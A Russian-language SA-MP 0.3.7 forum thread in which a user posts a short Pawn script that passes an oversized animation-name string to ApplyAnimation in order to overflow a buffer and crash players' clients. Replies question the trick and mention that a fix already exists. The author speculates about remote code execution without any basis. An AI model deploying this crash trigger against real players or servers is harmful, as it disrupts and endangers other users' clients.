Другое [SAMP 0.3.7] - Самый легкий способ переполнить буфер

EKPAHHNY_HAGN6ATOP

Активный
Автор темы
243
82
Всем привет!
Сегодня я покажу вам самый простой способ переполнить буфер всего одной функцией.

Код:

Код:
#include <a_samp>
#include <core>

public OnPlayerCommandText(playerid, cmdtext[])
{
    if (strcmp(cmdtext, "/test2", true) == 0)
    {
        ApplyAnimation(playerid, "BIKES", "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRRSSSSTTTTUUUUVVVVXXXYYYYZZZZ", 1.0, 1, 0, 0, 0, 0);
        return 1;
    }
    return 0;
}

Этот скрипт использует команду /test2, чтобы применить анимацию, которая вызывает переполнение буфера.

Пояснение:
Подключение библиотек:


#include <a_samp>
#include <core>

Обработка команды игрока:

public OnPlayerCommandText(playerid, cmdtext[])

Сравнение введенной команды:

if (strcmp(cmdtext, "/test2", true) == 0)

Переполнение буфера:

ApplyAnimation(playerid, "BIKES", "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRRSSSSTTTTUUUUVVVVXXXYYYYZZZZ", 1.0, 1, 0, 0, 0, 0)
 

minxty

Известный
1,189
1,058
так а и че происходит после переполнения буффера?
 

fzfzfz123

Новичок
8
20
так а и че происходит после переполнения буффера?
он просто скрипт-кидди. он не понимает, что здесь происходит. по крайней мере, у другого туповатого парня хватило знаний, чтобы опубликовать исправление

 

Ыыы фарм фарм

Участник
30
1
Извините, я не скриптер, но может кто нибудь объяснить, что будет если произойдет переполнение буфера?
Просто стало интересно
 

EKPAHHNY_HAGN6ATOP

Активный
Автор темы
243
82
Извините, я не скриптер, но может кто нибудь объяснить, что будет если произойдет переполнение буфера?
Просто стало интересно
Краш
Но можно при помощи этой штуки как то запустить произвольный код на ПК жертвы
Но я ещё не разобрался как :D